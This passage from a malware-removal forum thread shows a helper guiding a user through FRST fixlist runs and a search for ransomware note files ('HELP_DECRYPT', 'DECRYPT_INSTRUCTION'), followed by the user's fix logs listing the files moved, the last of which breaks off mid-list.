C:\Windows.old\Users\All Users\RogueKiller\Quarantine\BE8834083A072530.reg REG/Agent.AK trojan
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\D30EEB58F2B5284C.reg REG/Agent.AK trojan

  • 0

Advertisements


#11
dbreeze

dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts

Still a lot of clean up to do ...

 

First, run this FRST Fixlist script >>>>

 

Download the attached fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 by right clicking on the FRST64.exe file, selecting "Run as Administrator..".  The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.  

The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on.  Press the Fix button just once and wait.  The tool will create a restore point, process the script and ask for a restart of your system.

Press%20the%20FIX%20button_zpslenkmnr9.p

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

 

 

Second, let's run a Search with FRST....

 

Start FRST64 by right clicking on it and selecting "Run as Administrator"

 

Once it opens, copy the following text into the Search box.

 

 

HELP_DECRYPT.*;DECRYPT_INSTRUCTION.*

 

 

 

Click the Search Files button and wait.  FRST will display a procgress bar and messages and when finished, produce a Search.txt log file.  Please attach that file to a reply post here (it will most likely be too large to paste the text in a reply).

 

 

Attached Files


  • 0

#12
allforhimblog

allforhimblog

    Member

  • Topic Starter
  • Member
  • PipPip
  • 98 posts

Attached is the search log and pasted here is the fix log, thanks again!!

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 25-02-2015 01
Ran by Dorothy01 at 2015-02-26 20:54:30 Run:2
Running from C:\Users\Dorothy01\Desktop
Loaded Profiles: Dorothy01 (Available profiles: Dorothy01)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
start
CreateRestorePoint:
CloseProcesses:
C:\System Volume Information\HELP_DECRYPT.HTML
C:\System Volume Information\HELP_DECRYPT.TXT
C:\System Volume Information\EfaData\HELP_DECRYPT.HTML
C:\System Volume Information\EfaData\HELP_DECRYPT.TXT
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Macromedia\Flash Player\FlashPlayerUpdateService.exe Win32/Agent.WSE trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\6F2HFX6I.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\F80C8YK2.htm
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\ILESJKL3.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\K0KQ6VJD.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\N6C9B6FT.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\PICRTI7N.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\TE1HBMFT.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\G8HIT1UX.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\MGN8REVU.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\R1QO5JP1.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\YISNRMU8.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Temp\D163.tmp 
C:\Users\Dorothy01\AppData\Local\Temp\~009CE97E.tmp 
C:\Users\Dorothy01\AppData\Local\Temp\41c\AppData\Local\Microsoft\Windows\INetCache\IE\1C1SW3MG\82123fbcab77830f3af0dcbe5208a3d5[1].htm 
C:\Users\Dorothy01\AppData\Local\Temp\c4\AppData\Local\Microsoft\Windows\INetCache\IE\C7ZS5GJ0\a780b2c52f7951abae3fde16fd81989d[1].htm 
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631.exe
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631tmp.exe
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.TXT 
C:\Users\Public\DECRYPT_INSTRUCTION.HTML 
C:\Users\Public\DECRYPT_INSTRUCTION.TXT 
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.HTML 
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.TXT 
C:\Windows\Installer\dfb9a6.msi
C:\Windows.old\DECRYPT_INSTRUCTION.HTML 
C:\Windows.old\DECRYPT_INSTRUCTION.TXT 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\0094F143FFE16510.reg 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\24E53487FEB8DA78.reg 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\7C9DEC56C370BF3C.reg 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\81438BB61F59B727.reg 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\BE8834083A072530.reg 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\D30EEB58F2B5284C.reg 
Reboot:
end
 
 
 
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\System Volume Information\HELP_DECRYPT.HTML => Moved successfully.
C:\System Volume Information\HELP_DECRYPT.TXT => Moved successfully.
C:\System Volume Information\EfaData\HELP_DECRYPT.HTML => Moved successfully.
C:\System Volume Information\EfaData\HELP_DECRYPT.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.TXT => Moved successfully.
"C:\Users\Dorothy01\AppData\Local\Macromedia\Flash Player\FlashPlayerUpdateService.exe Win32/Agent.WSE trojan" => File/Directory not found.
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\6F2HFX6I.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\F80C8YK2.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\ILESJKL3.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\K0KQ6VJD.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\N6C9B6FT.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\PICRTI7N.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\TE1HBMFT.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\G8HIT1UX.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\MGN8REVU.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\R1QO5JP1.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\YISNRMU8.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\D163.tmp => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\~009CE97E.tmp => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\41c\AppData\Local\Microsoft\Windows\INetCache\IE\1C1SW3MG\82123fbcab77830f3af0dcbe5208a3d5[1].htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\c4\AppData\Local\Microsoft\Windows\INetCache\IE\C7ZS5GJ0\a780b2c52f7951abae3fde16fd81989d[1].htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631.exe => Moved successfully.
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631tmp.exe => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Public\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Public\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows\Installer\dfb9a6.msi => Moved successfully.
C:\Windows.old\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\0094F143FFE16510.reg => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\24E53487FEB8DA78.reg => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\7C9DEC56C370BF3C.reg => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\81438BB61F59B727.reg => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\BE8834083A072530.reg => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\D30EEB58F2B5284C.reg => Moved successfully.
 
 
The system needed a reboot. 
 
==== End of Fixlog 20:55:35 ====

Attached Files


  • 0

#13
dbreeze

dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts

Once more into the breech, my friends ....

 

Download the attached fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 by right clicking on the FRST64.exe file, selecting "Run as Administrator..".  The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.  

The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on.  Press the Fix button just once and wait.  The tool will create a restore point, process the script and ask for a restart of your system.

Press%20the%20FIX%20button_zpslenkmnr9.p

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
 

Attached Files


  • 0

#14
allforhimblog

allforhimblog

    Member

  • Topic Starter
  • Member
  • PipPip
  • 98 posts

Okay, posted below is the new fixlog!

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 25-02-2015 01
Ran by Dorothy01 at 2015-02-27 06:26:14 Run:3
Running from C:\Users\Dorothy01\Desktop
Loaded Profiles: Dorothy01 (Available profiles: Dorothy01)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
start
CreateRestorePoint:
CloseProcesses:
C:\Windows.old\Users\Dorothy01\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\DECRYPT_INSTRUCTION.TXT
C:\Windows.old\Users\Dorothy01\AppData\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\AppData\DECRYPT_INSTRUCTION.TXT
C:\Windows.old\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.TXT
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\DECRYPT_INSTRUCTION.TXT
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\12.0\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\12.0\DECRYPT_INSTRUCTION.TXT
C:\Users\Public\DECRYPT_INSTRUCTION.URL
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.URL
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.URL
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.URL
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.URL
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.URL
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Recent\DECRYPT_INSTRUCTION.lnk
C:\System Volume Information\HELP_DECRYPT.PNG
C:\System Volume Information\HELP_DECRYPT.URL
C:\System Volume Information\EfaData\HELP_DECRYPT.PNG
C:\System Volume Information\EfaData\HELP_DECRYPT.URL
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.HTML
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.PNG
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.TXT
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.URL
Reboot:
end
 
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Windows.old\Users\Dorothy01\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\12.0\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\12.0\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Public\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.URL => Moved successfully.
